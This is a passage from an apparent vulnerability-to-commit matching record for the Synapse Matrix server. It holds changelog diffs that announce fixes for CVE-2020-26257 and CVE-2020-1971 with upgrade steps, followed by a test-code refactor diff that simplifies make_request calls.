"diff": [ + "diff --cc CHANGES.md", + "index 677afeebc,55f53eb69..81b12e9b9", + "--- a/CHANGES.md", + "+++ b/CHANGES.md", + "@@@ -1,134 -1,53 +1,188 @@@", + " +Synapse 1.24.0 (2020-12-09)", + " +===========================", + " +", + " +Due to the two security issues highlighted below, server administrators are", + " +encouraged to update Synapse. We are not aware of these vulnerabilities being", + " +exploited in the wild.", + " +", + " +Security advisory", + " +-----------------", + " +", + " +The following issues are fixed in v1.23.1 and v1.24.0.", + " +", + " +- There is a denial of service attack", + " + ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257))", + " + against the federation APIs in which future events will not be correctly sent", + " + to other servers over federation. This affects all servers that participate in", + " + open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)).", + " +", + " +- Synapse may be affected by OpenSSL", + " + [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971).", + " + Synapse administrators should ensure that they have the latest versions of", + " + the cryptography Python package installed.", + " +", + " +To upgrade Synapse along with the cryptography package:", + " +", + " +* Administrators using the [`matrix.org` Docker", + " + image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu", + " + packages from", + " + `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages)", + " + should ensure that they have version 1.24.0 or 1.23.1 installed: these images include", + " + the updated packages.", + " +* Administrators who have [installed Synapse from", + " + source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source)", + " + should upgrade the cryptography package within their virtualenv by running:", + " + ```sh", + " + /bin/pip install 'cryptography>=3.3'", + " + ```", + " +* Administrators who have installed Synapse from distribution packages should", + " + consult the information from their distributions.", + " +", + " +Internal Changes", + " +----------------", + " +", + " +- Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", + " +", + " +", + "+ Synapse 1.23.1 (2020-12-09)", + "+ ===========================", + "+ ", + "+ Due to the two security issues highlighted below, server administrators are", + "+ encouraged to update Synapse. We are not aware of these vulnerabilities being", + "+ exploited in the wild.", + "+ ", + "+ Security advisory", + "+ -----------------", + "+ ", + "+ The following issues are fixed in v1.23.1 and v1.24.0.", + "+ ", + "+ - There is a denial of service attack", + "+ ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257))", + "+ against the federation APIs in which future events will not be correctly sent", + "+ to other servers over federation. This affects all servers that participate in", + "+ open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)).", + "+ ", + "+ - Synapse may be affected by OpenSSL", + "+ [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971).", + "+ Synapse administrators should ensure that they have the latest versions of", + "+ the cryptography Python package installed.", + "+ ", + "+ To upgrade Synapse along with the cryptography package:", + "+ ", + "+ * Administrators using the [`matrix.org` Docker", + "+ image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu", + "+ packages from", + "+ `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages)", + "+ should ensure that they have version 1.24.0 or 1.23.1 installed: these images include", + "+ the updated packages.", + "+ * Administrators who have [installed Synapse from", + "+ source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source)", + "+ should upgrade the cryptography package within their virtualenv by running:", + "+ ```sh", + "+ /bin/pip install 'cryptography>=3.3'", + "+ ```", + "+ * Administrators who have installed Synapse from distribution packages should", + "+ consult the information from their distributions.", + "+ ", + "+ Bugfixes", + "+ --------", + "+ ", + "+ - Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776))", + "+ ", + "+ ", + "+ Internal Changes", + "+ ----------------", + "+ ", + "+ - Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", + "+ ", + "+ ", + " +Synapse 1.24.0rc2 (2020-12-04)", + " +==============================", + " +", + " +Bugfixes", + " +--------", + " +", + " +- Fix a regression in v1.24.0rc1 which failed to allow SAML mapping providers which were unable to redirect users to an additional page. ([\\#8878](https://github.com/matrix-org/synapse/issues/8878))", + " +", + " +", + " +Internal Changes", + " +----------------", + " +", + " +- Add support for the `prometheus_client` newer than 0.9.0. Contributed by Jordan Bancino. ([\\#8875](https://github.com/matrix-org/synapse/issues/8875))", + " +", + " +", + " +Synapse 1.24.0rc1 (2020-12-02)", + " +==============================", + " +", + " +Features", + " +--------", + " +", + " +- Add admin API for logging in as a user. ([\\#8617](https://github.com/matrix-org/synapse/issues/8617))", + " +- Allow specification of the SAML IdP if the metadata returns multiple IdPs. ([\\#8630](https://github.com/matrix-org/synapse/issues/8630))", + " +- Add support for re-trying generation of a localpart for OpenID Connect mapping providers. ([\\#8801](https://github.com/matrix-org/synapse/issues/8801), [\\#8855](https://github.com/matrix-org/synapse/issues/8855))", + " +- Allow the `Date` header through CORS. Contributed by Nicolas Chamo. ([\\#8804](https://github.com/matrix-org/synapse/issues/8804))", + " +- Add a config option, `push.group_by_unread_count`, which controls whether unread message counts in push notifications are defined as \"the number of rooms with unread messages\" or \"total unread messages\". ([\\#8820](https://github.com/matrix-org/synapse/issues/8820))", + " +- Add `force_purge` option to delete-room admin api. ([\\#8843](https://github.com/matrix-org/synapse/issues/8843))", + " +", + " +", + " +Bugfixes", + " +--------", + " +", + " +- Fix a bug where appservices may be sent an excessive amount of read receipts and presence. Broke in v1.22.0. ([\\#8744](https://github.com/matrix-org/synapse/issues/8744))", + " +- Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776))", + " +- Fix a bug where synctl could spawn duplicate copies of a worker. Contributed by Waylon Cude. ([\\#8798](https://github.com/matrix-org/synapse/issues/8798))", + " +- Allow per-room profiles to be used for the server notice user. ([\\#8799](https://github.com/matrix-org/synapse/issues/8799))", + " +- Fix a bug where logging could break after a call to SIGHUP. ([\\#8817](https://github.com/matrix-org/synapse/issues/8817))", + " +- Fix `register_new_matrix_user` failing with \"Bad Request\" when trailing slash is included in server URL. Contributed by @angdraug. ([\\#8823](https://github.com/matrix-org/synapse/issues/8823))", + " +- Fix a minor long-standing bug in login, where we would offer the `password` login type if a custom auth provider supported it, even if password login was disabled. ([\\#8835](https://github.com/matrix-org/synapse/issues/8835))", + " +- Fix a long-standing bug which caused Synapse to require unspecified parameters during user-interactive authentication. ([\\#8848](https://github.com/matrix-org/synapse/issues/8848))", + " +- Fix a bug introduced in v1.20.0 where the user-agent and IP address reported during user registration for CAS, OpenID Connect, and SAML were of the wrong form. ([\\#8784](https://github.com/matrix-org/synapse/issues/8784))", + " +", + " +", + " +Improved Documentation", + " +----------------------", + " +", + " +- Clarify the usecase for a msisdn delegate. Contributed by Adrian Wannenmacher. ([\\#8734](https://github.com/matrix-org/synapse/issues/8734))", + " +- Remove extraneous comma from JSON example in User Admin API docs. ([\\#8771](https://github.com/matrix-org/synapse/issues/8771))", + " +- Update `turn-howto.md` with troubleshooting notes. ([\\#8779](https://github.com/matrix-org/synapse/issues/8779))", + " +- Fix the example on how to set the `Content-Type` header in nginx for the Client Well-Known URI. ([\\#8793](https://github.com/matrix-org/synapse/issues/8793))", + " +- Improve the documentation for the admin API to list all media in a room with respect to encrypted events. ([\\#8795](https://github.com/matrix-org/synapse/issues/8795))", + " +- Update the formatting of the `push` section of the homeserver config file to better align with the [code style guidelines](https://github.com/matrix-org/synapse/blob/develop/docs/code_style.md#configuration-file-format). ([\\#8818](https://github.com/matrix-org/synapse/issues/8818))", + " +- Improve documentation how to configure prometheus for workers. ([\\#8822](https://github.com/matrix-org/synapse/issues/8822))", + " +- Update example prometheus console. ([\\#8824](https://github.com/matrix-org/synapse/issues/8824))", + " +", + " +", + " +Deprecations and Removals", + " +-------------------------", + " +", + " +- Remove old `/_matrix/client/*/admin` endpoints which were deprecated since Synapse 1.20.0. ([\\#8785](https://github.com/matrix-org/synapse/issues/8785))", + " +- Disable pretty printing JSON responses for curl. Users who want pretty-printed output should use [jq](https://stedolan.github.io/jq/) in combination with curl. Contributed by @tulir. ([\\#8833](https://github.com/matrix-org/synapse/issues/8833))", + " +", + " +", + " +Internal Changes", + " +----------------", + " +", + " +- Simplify the way the `HomeServer` object caches its internal attributes. ([\\#8565](https://github.com/matrix-org/synapse/issues/8565), [\\#8851](https://github.com/matrix-org/synapse/issues/8851))", + " +- Add an example and documentation for clock skew to the SAML2 sample configuration to allow for clock/time difference between the homserver and IdP. Contributed by @localguru. ([\\#8731](https://github.com/matrix-org/synapse/issues/8731))", + " +- Generalise `RoomMemberHandler._locally_reject_invite` to apply to more flows than just invite. ([\\#8751](https://github.com/matrix-org/synapse/issues/8751))", + " +- Generalise `RoomStore.maybe_store_room_on_invite` to handle other, non-invite membership events. ([\\#8754](https://github.com/matrix-org/synapse/issues/8754))", + " +- Refactor test utilities for injecting HTTP requests. ([\\#8757](https://github.com/matrix-org/synapse/issues/8757), [\\#8758](https://github.com/matrix-org/synapse/issues/8758), [\\#8759](https://github.com/matrix-org/synapse/issues/8759), [\\#8760](https://github.com/matrix-org/synapse/issues/8760), [\\#8761](https://github.com/matrix-org/synapse/issues/8761), [\\#8777](https://github.com/matrix-org/synapse/issues/8777))", + " +- Consolidate logic between the OpenID Connect and SAML code. ([\\#8765](https://github.com/matrix-org/synapse/issues/8765))", + " +- Use `TYPE_CHECKING` instead of magic `MYPY` variable. ([\\#8770](https://github.com/matrix-org/synapse/issues/8770))", + " +- Add a commandline script to sign arbitrary json objects. ([\\#8772](https://github.com/matrix-org/synapse/issues/8772))", + " +- Minor log line improvements for the SSO mapping code used to generate Matrix IDs from SSO IDs. ([\\#8773](https://github.com/matrix-org/synapse/issues/8773))", + " +- Add additional error checking for OpenID Connect and SAML mapping providers. ([\\#8774](https://github.com/matrix-org/synapse/issues/8774), [\\#8800](https://github.com/matrix-org/synapse/issues/8800))", + " +- Add type hints to HTTP abstractions. ([\\#8806](https://github.com/matrix-org/synapse/issues/8806), [\\#8812](https://github.com/matrix-org/synapse/issues/8812))", + " +- Remove unnecessary function arguments and add typing to several membership replication classes. ([\\#8809](https://github.com/matrix-org/synapse/issues/8809))", + " +- Optimise the lookup for an invite from another homeserver when trying to reject it. ([\\#8815](https://github.com/matrix-org/synapse/issues/8815))", + " +- Add tests for `password_auth_provider`s. ([\\#8819](https://github.com/matrix-org/synapse/issues/8819))", + " +- Drop redundant database index on `event_json`. ([\\#8845](https://github.com/matrix-org/synapse/issues/8845))", + " +- Simplify `uk.half-shot.msc2778.login.application_service` login handler. ([\\#8847](https://github.com/matrix-org/synapse/issues/8847))", + " +- Refactor `password_auth_provider` support code. ([\\#8849](https://github.com/matrix-org/synapse/issues/8849))", + " +- Add missing `ordering` to background database updates. ([\\#8850](https://github.com/matrix-org/synapse/issues/8850))", + " +- Allow for specifying a room version when creating a room in unit tests via `RestHelper.create_room_as`. ([\\#8854](https://github.com/matrix-org/synapse/issues/8854))", + " +", + " +", + "++", + "++", + " Synapse 1.23.0 (2020-11-18)", + "diff --cc debian/changelog", + "index 9f47d12b7,0342fafdd..6b819d201", + "--- a/debian/changelog", + "+++ b/debian/changelog", + "@@@ -1,7 -1,7 +1,13 @@@", + " +matrix-synapse-py3 (1.24.0) stable; urgency=medium", + " +", + " + * New synapse release 1.24.0.", + " +", + " + -- Synapse Packaging team Wed, 09 Dec 2020 10:14:30 +0000", + " +", + "+ matrix-synapse-py3 (1.23.1) stable; urgency=medium", + "+ ", + "+ * New synapse release 1.23.1.", + "+ ", + "+ -- Synapse Packaging team Wed, 09 Dec 2020 10:40:39 +0000", + "+ ", + " matrix-synapse-py3 (1.23.0) stable; urgency=medium" + ], + "changed_files": [], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8776": "", + "8898": "" + }, + "cve_refs": [ + "CVE-2020-26257", + "CVE-2020-1971" + ], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: matrix-synapse", + "relevance": 8 + }, + { + "id": "SEC_KEYWORDS_IN_MESSAGE", + "message": "The commit message contains some security-related keywords: security, attack", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_MSG", + "message": "The commit message and the advisory description contain the following keywords: service, issue, lead, python, request, attack, version, package, affect, federation, server, denial", + "relevance": 4 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8776, 8898", + "relevance": 2 + } + ] + }, + { + "commit_id": "394516ad1bb6127ab5b32a12d81ef307deb39570", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608043444, + "hunks": 744, + "message": "Remove spurious \"SynapseRequest\" result from `make_request\" This was never used, so let's get rid of it.", + "diff": [ + "diff --git a/tests/app/test_frontend_proxy.py b/tests/app/test_frontend_proxy.py", + "index 43fef5d64..e0ca28882 100644", + "--- a/tests/app/test_frontend_proxy.py", + "+++ b/tests/app/test_frontend_proxy.py", + "@@ -59,3 +59,3 @@ class FrontendProxyTests(HomeserverTestCase):", + "- _, channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", + "+ channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", + "@@ -79,3 +79,3 @@ class FrontendProxyTests(HomeserverTestCase):", + "- _, channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", + "+ channel = make_request(self.reactor, site, \"PUT\", \"presence/a/status\")", + "diff --git a/tests/app/test_openid_listener.py b/tests/app/test_openid_listener.py", + "index b260ab734..467033e20 100644", + "--- a/tests/app/test_openid_listener.py", + "+++ b/tests/app/test_openid_listener.py", + "@@ -75,3 +75,3 @@ class FederationReaderOpenIDListenerTests(HomeserverTestCase):", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.reactor, site, \"GET\", \"/_matrix/federation/v1/openid/userinfo\"", + "@@ -123,3 +123,3 @@ class SynapseHomeserverOpenIDListenerTests(HomeserverTestCase):", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.reactor, site, \"GET\", \"/_matrix/federation/v1/openid/userinfo\"", + "diff --git a/tests/federation/test_complexity.py b/tests/federation/test_complexity.py", + "index 0187f56e2..9ccd2d76b 100644", + "--- a/tests/federation/test_complexity.py", + "+++ b/tests/federation/test_complexity.py", + "@@ -50,3 +50,3 @@ class RoomComplexityTests(unittest.FederatingHomeserverTestCase):", + " # Get the room complexity", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/federation/unstable/rooms/%s/complexity\" % (room_1,)", + "@@ -62,3 +62,3 @@ class RoomComplexityTests(unittest.FederatingHomeserverTestCase):", + " # Get the room complexity again -- make sure it's our artificial value", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/federation/unstable/rooms/%s/complexity\" % (room_1,)", + "diff --git a/tests/federation/test_federation_server.py b/tests/federation/test_federation_server.py", + "index 3009fbb6c..cfeccc057 100644", + "--- a/tests/federation/test_federation_server.py", + "+++ b/tests/federation/test_federation_server.py", + "@@ -48,3 +48,3 @@ class FederationServerTests(unittest.FederatingHomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -97,3 +97,3 @@ class StateQueryTests(unittest.FederatingHomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/federation/v1/state/%s\" % (room_1,)", + "@@ -129,3 +129,3 @@ class StateQueryTests(unittest.FederatingHomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/_matrix/federation/v1/state/%s\" % (room_1,)", + "diff --git a/tests/federation/transport/test_server.py b/tests/federation/transport/test_server.py", + "index f9e3c7a51..212fb79a0 100644", + "--- a/tests/federation/transport/test_server.py", + "+++ b/tests/federation/transport/test_server.py", + "@@ -39,5 +39,3 @@ class RoomDirectoryFederationTests(unittest.HomeserverTestCase):", + " def test_blocked_public_room_list_over_federation(self):", + "- request, channel = self.make_request(", + "- \"GET\", \"/_matrix/federation/v1/publicRooms\"", + "- )", + "+ channel = self.make_request(\"GET\", \"/_matrix/federation/v1/publicRooms\")", + " self.assertEquals(403, channel.code)", + "@@ -46,5 +44,3 @@ class RoomDirectoryFederationTests(unittest.HomeserverTestCase):", + " def test_open_public_room_list_over_federation(self):", + "- request, channel = self.make_request(", + "- \"GET\", \"/_matrix/federation/v1/publicRooms\"", + "- )", + "+ channel = self.make_request(\"GET\", \"/_matrix/federation/v1/publicRooms\")", + " self.assertEquals(200, channel.code)", + "diff --git a/tests/handlers/test_directory.py b/tests/handlers/test_directory.py", + "index 770d225ed..a39f89860 100644", + "--- a/tests/handlers/test_directory.py", + "+++ b/tests/handlers/test_directory.py", + "@@ -407,3 +407,3 @@ class TestCreateAliasACL(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -417,3 +417,3 @@ class TestCreateAliasACL(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -433,3 +433,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", b\"directory/list/room/%s\" % (room_id.encode(\"ascii\"),), b\"{}\"", + "@@ -448,3 +448,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", + " # Room list is enabled so we should get some results", + "- request, channel = self.make_request(\"GET\", b\"publicRooms\")", + "+ channel = self.make_request(\"GET\", b\"publicRooms\")", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -456,3 +456,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", + " # Room list disabled so we should get no results", + "- request, channel = self.make_request(\"GET\", b\"publicRooms\")", + "+ channel = self.make_request(\"GET\", b\"publicRooms\")", + " self.assertEquals(200, channel.code, channel.result)", + "@@ -462,3 +462,3 @@ class TestRoomListSearchDisabled(unittest.HomeserverTestCase):", + " room_id = self.helper.create_room_as(self.user_id)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", b\"directory/list/room/%s\" % (room_id.encode(\"ascii\"),), b\"{}\"", + "diff --git a/tests/handlers/test_message.py b/tests/handlers/test_message.py", + "index af4277581..f955dfa49 100644", + "--- a/tests/handlers/test_message.py", + "+++ b/tests/handlers/test_message.py", + "@@ -208,3 +208,3 @@ class ServerAclValidationTestCase(unittest.HomeserverTestCase):", + " path = \"/_matrix/client/r0/rooms/%s/redact/%s\" % (self.room_id, event_id)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", path, content={}, access_token=self.access_token", + "diff --git a/tests/handlers/test_password_providers.py b/tests/handlers/test_password_providers.py", + "index 8d5026514..f816594ee 100644", + "--- a/tests/handlers/test_password_providers.py", + "+++ b/tests/handlers/test_password_providers.py", + "@@ -553,3 +553,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", + " def _get_login_flows(self) -> JsonDict:", + "- _, channel = self.make_request(\"GET\", \"/_matrix/client/r0/login\")", + "+ channel = self.make_request(\"GET\", \"/_matrix/client/r0/login\")", + " self.assertEqual(channel.code, 200, channel.result)", + "@@ -562,3 +562,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", + " params.update({\"identifier\": {\"type\": \"m.id.user\", \"user\": user}, \"type\": type})", + "- _, channel = self.make_request(\"POST\", \"/_matrix/client/r0/login\", params)", + "+ channel = self.make_request(\"POST\", \"/_matrix/client/r0/login\", params)", + " return channel", + "@@ -599,3 +599,3 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", + " \"\"\"Delete an individual device.\"\"\"", + "- _, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", \"devices/\" + device, body, access_token=access_token", + "diff --git a/tests/handlers/test_typing.py b/tests/handlers/test_typing.py", + "index f21de958f..96e5bdac4 100644", + "--- a/tests/handlers/test_typing.py", + "+++ b/tests/handlers/test_typing.py", + "@@ -222,3 +222,3 @@ class TypingNotificationsTestCase(unittest.HomeserverTestCase):", + "- (request, channel) = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "diff --git a/tests/handlers/test_user_directory.py b/tests/handlers/test_user_directory.py", + "index 647a17cb9..1260721db 100644", + "--- a/tests/handlers/test_user_directory.py", + "+++ b/tests/handlers/test_user_directory.py", + "@@ -536,3 +536,3 @@ class TestUserDirSearchDisabled(unittest.HomeserverTestCase):", + " # Assert user directory is not empty", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", b\"user_directory/search\", b'{\"search_term\":\"user2\"}'", + "@@ -544,3 +544,3 @@ class TestUserDirSearchDisabled(unittest.HomeserverTestCase):", + " self.config.user_directory_search_enabled = False", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", b\"user_directory/search\", b'{\"search_term\":\"user2\"}'", + "diff --git a/tests/http/test_additional_resource.py b/tests/http/test_additional_resource.py", + "index adc318caa..453391a5a 100644", + "--- a/tests/http/test_additional_resource.py", + "+++ b/tests/http/test_additional_resource.py", + "@@ -48,3 +48,3 @@ class AdditionalResourceTests(HomeserverTestCase):", + "- request, channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", + "+ channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", + "@@ -57,3 +57,3 @@ class AdditionalResourceTests(HomeserverTestCase):", + "- request, channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", + "+ channel = make_request(self.reactor, FakeSite(resource), \"GET\", \"/\")", + "diff --git a/tests/push/test_http.py b/tests/push/test_http.py", + "index 8b4af74c5..cb3245d8c 100644", + "--- a/tests/push/test_http.py", + "+++ b/tests/push/test_http.py", + "@@ -669,3 +669,3 @@ class HTTPPusherTests(HomeserverTestCase):", + " # count goes down", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "diff --git a/tests/replication/test_auth.py b/tests/replication/test_auth.py", + "index aee839dc6..c5ab3032a 100644", + "--- a/tests/replication/test_auth.py", + "+++ b/tests/replication/test_auth.py", + "@@ -49,3 +49,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + "- def _test_register(self) -> Tuple[SynapseRequest, FakeChannel]:", + "+ def _test_register(self) -> FakeChannel:", + " \"\"\"Run the actual test:", + "@@ -61,3 +61,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + "- request_1, channel_1 = make_request(", + "+ channel_1 = make_request(", + " self.reactor,", + "@@ -67,3 +67,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel_1.code, 401)", + "@@ -85,3 +85,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " \"\"\"", + "- request, channel = self._test_register()", + "+ channel = self._test_register()", + " self.assertEqual(channel.code, 200)", + "@@ -95,3 +95,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " \"\"\"", + "- request, channel = self._test_register()", + "+ channel = self._test_register()", + " self.assertEqual(channel.code, 500)", + "@@ -107,3 +107,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " \"\"\"", + "- request, channel = self._test_register()", + "+ channel = self._test_register()", + " self.assertEqual(channel.code, 500)", + "@@ -114,3 +114,3 @@ class WorkerAuthenticationTestCase(BaseMultiWorkerStreamTestCase):", + " \"\"\"", + "- request, channel = self._test_register()", + "+ channel = self._test_register()", + " self.assertEqual(channel.code, 200)", + "diff --git a/tests/replication/test_client_reader_shard.py b/tests/replication/test_client_reader_shard.py", + "index 6cdf6a099..abcc74f93 100644", + "--- a/tests/replication/test_client_reader_shard.py", + "+++ b/tests/replication/test_client_reader_shard.py", + "@@ -43,3 +43,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + "- request_1, channel_1 = make_request(", + "+ channel_1 = make_request(", + " self.reactor,", + "@@ -49,3 +49,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel_1.code, 401)", + "@@ -56,3 +56,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " # also complete the dummy auth", + "- request_2, channel_2 = make_request(", + "+ channel_2 = make_request(", + " self.reactor,", + "@@ -62,3 +62,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + 